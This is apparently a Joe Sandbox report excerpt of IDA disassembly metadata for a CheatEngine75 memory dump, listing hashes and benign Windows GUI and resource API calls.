                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$Icon$DeleteDestroy$Select$CompatibleCopyCreateDrawFillH_prolog3_ImageInfoRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2061919445-0
                                                                                                                                                                                                                                      • Opcode ID: 9a9883df9a81483aa598503767d65a6a70b96834b13f73c19e11fd93fe35b947
                                                                                                                                                                                                                                      • Instruction ID: 3703ae3705ee40b6d9ba1b950b87dd1ad9baef057c290693317f19510b8aff6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a9883df9a81483aa598503767d65a6a70b96834b13f73c19e11fd93fe35b947
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B61F771D0020AAFDF55DFA4C995EEEBBB5FF48302F148169E911E7260DB399902CB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCapture.USER32 ref: 6B4F3BE0
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 6B4F3BEA
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 6B4F3C03
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 6B4F3C1F
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 6B4F3C46
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6B4F3C87
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6B4F3CB7
                                                                                                                                                                                                                                      • GetCapture.USER32 ref: 6B4F3CE0
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 6B4F3CEA
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 6B4F3D03
                                                                                                                                                                                                                                      • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6B4F3D58
                                                                                                                                                                                                                                        • Part of subcall function 6B4F5A74: __EH_prolog3_GS.LIBCMT ref: 6B4F5A7B
                                                                                                                                                                                                                                        • Part of subcall function 6B4F5A74: IsRectEmpty.USER32(?), ref: 6B4F5A96
                                                                                                                                                                                                                                        • Part of subcall function 6B4F5A74: InvertRect.USER32(?,?), ref: 6B4F5AAC
                                                                                                                                                                                                                                        • Part of subcall function 6B4F5A74: SetRectEmpty.USER32(?), ref: 6B4F5ABF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$Capture$ClientEmptyMessageMetricsReleaseSendSystem$H_prolog3_InvertRedrawWindow
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 174338775-1841850333
                                                                                                                                                                                                                                      • Opcode ID: bd201bb241717611869b7101e66662fa3970cbbdd220c28743927ae9d7c008d8
                                                                                                                                                                                                                                      • Instruction ID: bded1bc3ffd0b329a197b260480675cc34678557c8a7aeb23114f071746b7bb1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd201bb241717611869b7101e66662fa3970cbbdd220c28743927ae9d7c008d8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB516C72A00619AFCF14DFB5C984AADBBB9FF49314F104269E819A7350DB34AE41CF91
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 0-1841850333
                                                                                                                                                                                                                                      • Opcode ID: e540865828b2169ed0b51def19f8af775dbecd2e11cb04d2e8cb28fe60f61641
                                                                                                                                                                                                                                      • Instruction ID: 389be86249736e3220d5af5d765ba80f856c372388e59ac964555b975df7914e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e540865828b2169ed0b51def19f8af775dbecd2e11cb04d2e8cb28fe60f61641
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9202AD39E08619EFCB11DF68C880D9FB7B1FF4AB14B118099E915AB350D739AD42CB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4F5A7B
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4ACF: __EH_prolog3.LIBCMT ref: 6B4D4AD6
                                                                                                                                                                                                                                        • Part of subcall function 6B4D4ACF: GetDC.USER32(00000000), ref: 6B4D4B02
                                                                                                                                                                                                                                      • IsRectEmpty.USER32(?), ref: 6B4F5A96
                                                                                                                                                                                                                                      • InvertRect.USER32(?,?), ref: 6B4F5AAC
                                                                                                                                                                                                                                      • SetRectEmpty.USER32(?), ref: 6B4F5ABF
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,00000000), ref: 6B4F5B0C
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 6B4F5B2A
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 6B4F5B50
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6B4F5B91
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6B4F5BC1
                                                                                                                                                                                                                                      • InvertRect.USER32(?,?), ref: 6B4F5BCD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$EmptyInvertMessageMetricsSendSystem$ClientH_prolog3H_prolog3_
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 3401445556-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 5e76450a6eb2c81ecffe0be2dd57696a9635660eb9cf81cceabadb8aba8859d2
                                                                                                                                                                                                                                      • Instruction ID: bc89e50a7229c1277e4ec2915269389658133f68e6e8dc7ab56e03d9811b78af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e76450a6eb2c81ecffe0be2dd57696a9635660eb9cf81cceabadb8aba8859d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30418A72800614DFCF05DFA4C988BDD7BB8FF46301F0540A8E909BB265DB78AA45CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B4EEBAF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EEBC9
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000001,000000C2,00000001,00000001), ref: 6B4EEDB9
                                                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 6B4EEDFB
                                                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 6B4EEFBD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$BeepSend$H_prolog3
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 280101887-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 3a48eb2159d7c60cb5123b1578347d316d57cbce88ac510294d3a81dd32580bf
                                                                                                                                                                                                                                      • Instruction ID: 6ea4339c0e1ecbb215da3281a2ba5fb5fb7351ecbd4addf46d598562db86d073
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a48eb2159d7c60cb5123b1578347d316d57cbce88ac510294d3a81dd32580bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27D16A75D5011AABCF40DFA4C885EEEB7B9BF48315F104169E911BB280DB38A902CBB1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,?), ref: 6B4F6886
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 6B4F6942
                                                                                                                                                                                                                                      • GetMenuDefaultItem.USER32(?,00000000,00000000), ref: 6B4F6981
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4F69AB
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4F69FF
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4F6A12
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 6B4F6A2C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Parent$MenuMessageSend$CreateDefaultItemPopup
                                                                                                                                                                                                                                      • String ID: $$0#Lk
                                                                                                                                                                                                                                      • API String ID: 3883924376-1429395334
                                                                                                                                                                                                                                      • Opcode ID: f7d63b36a92688373f6c51d39fc6367aa911f719bd2e3c63b4c03ef8f255ad6f
                                                                                                                                                                                                                                      • Instruction ID: 2a10580da8f67382e71e7bc23fe9ad551f4ec294af1b91358a6603eb67678b0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7d63b36a92688373f6c51d39fc6367aa911f719bd2e3c63b4c03ef8f255ad6f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D514871A00219AFDB10EFA5CD44E9EBBB9EF49700F1040A9E915E72A0EB75D942CF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 6B4F0BD7
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 6B4F0C1A
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 6B4F0C75
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4F0C84
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000111,?,?), ref: 6B4F0CB6
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 6B4F0CD6
                                                                                                                                                                                                                                      • UpdateWindow.USER32(?), ref: 6B4F0CDF
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 6B4F0CEE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 2465089168-1841850333
                                                                                                                                                                                                                                      • Opcode ID: ac12fd4c931317b72828f52826f67011534e7bb888732725c7f1b0e69363a402
                                                                                                                                                                                                                                      • Instruction ID: 33bb63b04167beb2a728fe8c6d217083531d9c330d8c902adaa2f9ee376317b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac12fd4c931317b72828f52826f67011534e7bb888732725c7f1b0e69363a402
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0412BB0A04706FFDB089F75C984BAAFBB9FB89701F00016AE51993250D778A951CFA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B4D3951: __EH_prolog3_catch.LIBCMT ref: 6B4D3958
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(comctl32.dll,6B4E3C93,?,00000000,?,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3B7F
                                                                                                                                                                                                                                      • GetUserDefaultUILanguage.KERNEL32(?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3B90
                                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,00000005,?,0000FC11,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3BCF
                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000005,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3BEC
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3BFA
                                                                                                                                                                                                                                        • Part of subcall function 6B4E3CD1: GetDC.USER32(00000000), ref: 6B4E3D24
                                                                                                                                                                                                                                        • Part of subcall function 6B4E3CD1: EnumFontFamiliesExW.GDI32(00000000,?,6B4E3CBB,?,00000000,?,?,?,?,?,?,00000000), ref: 6B4E3D3F
                                                                                                                                                                                                                                        • Part of subcall function 6B4E3CD1: ReleaseDC.USER32(00000000,00000000), ref: 6B4E3D47
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,?,6B4DC01D,?,?,6B4DAA84,0000001C,6B4DBE17,?,6B4DAA84), ref: 6B4E3C2A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalH_prolog3_catchHandleLanguageLoadModuleReleaseUser
                                                                                                                                                                                                                                      • String ID: MS UI Gothic$comctl32.dll
                                                                                                                                                                                                                                      • API String ID: 3737665285-3248924666
                                                                                                                                                                                                                                      • Opcode ID: c7a9bab3ac37e6441f7bd49de9e88477db1e3a3a7bd59ccbb2bc757623c20eb7
                                                                                                                                                                                                                                      • Instruction ID: d3d038f7c3726dcd1aff538c577cd0430ca3d881b4e0ab4fd1f043e1a5473e1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7a9bab3ac37e6441f7bd49de9e88477db1e3a3a7bd59ccbb2bc757623c20eb7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C541E576600606AFEB226B75CC4AF6B73A9EF41715B00446CF816CB3A0EB38ED418771
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,00000000,00000000,?,?,6B501952,00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B50196A
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 6B50197F
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000,00000000), ref: 6B50199B
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6B694B00), ref: 6B5019B6
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6B694B00,00000000), ref: 6B501A22
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 6B501A29
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6B501A30
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$CriticalSection$AllocCreateEnterFreeLeaveLockStreamUnlock
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 56479573-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 6d78d9c389276954f7c996e3e7304199d1e42ed5bf21b686f0c8998671710e37
                                                                                                                                                                                                                                      • Instruction ID: ca1a77a771cae5377780480103b6210bed250a16295fae24e37761ff6309a8cc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d78d9c389276954f7c996e3e7304199d1e42ed5bf21b686f0c8998671710e37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C321A135600212AFEF24ABB6CC59BAE37A9EF46659F000068F511D3250DFB8C901DBA2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6B4D8937
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 6B4D8947
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D8950
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D895E
                                                                                                                                                                                                                                      • DrawThemeText.UXTHEME(?,?,?,?,?,?,?,00000000,?), ref: 6B4D89AB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressDecodeDrawEncodeHandleModuleProcTextTheme
                                                                                                                                                                                                                                      • String ID: 0#Lk$DrawThemeTextEx$uxtheme.dll
                                                                                                                                                                                                                                      • API String ID: 1727381832-3457611663
                                                                                                                                                                                                                                      • Opcode ID: c75aa03e7e622683cd2463f09a2817fb9f76958784512b90b701dab0021e012c
                                                                                                                                                                                                                                      • Instruction ID: 19636436005c2c2e98fbfea99f5865d9d707227e0e0ae1120d081c115383219e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c75aa03e7e622683cd2463f09a2817fb9f76958784512b90b701dab0021e012c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E911B33250025AEBDF126FA1CC18DEA3F76FF0E795B046150FE55A1220C73AD822AB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4C8981
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000080), ref: 6B4C89C8
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,?), ref: 6B4C89F4
                                                                                                                                                                                                                                      • ValidateRect.USER32(?,00000000), ref: 6B4C8A07
                                                                                                                                                                                                                                        • Part of subcall function 6B4D7145: GetClientRect.USER32(?,?), ref: 6B4D71AF
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 6B4C8A7F
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 6B4C8A8C
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,?), ref: 6B4C8AC2
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000), ref: 6B4C8AE4
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 6B4C8AFC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
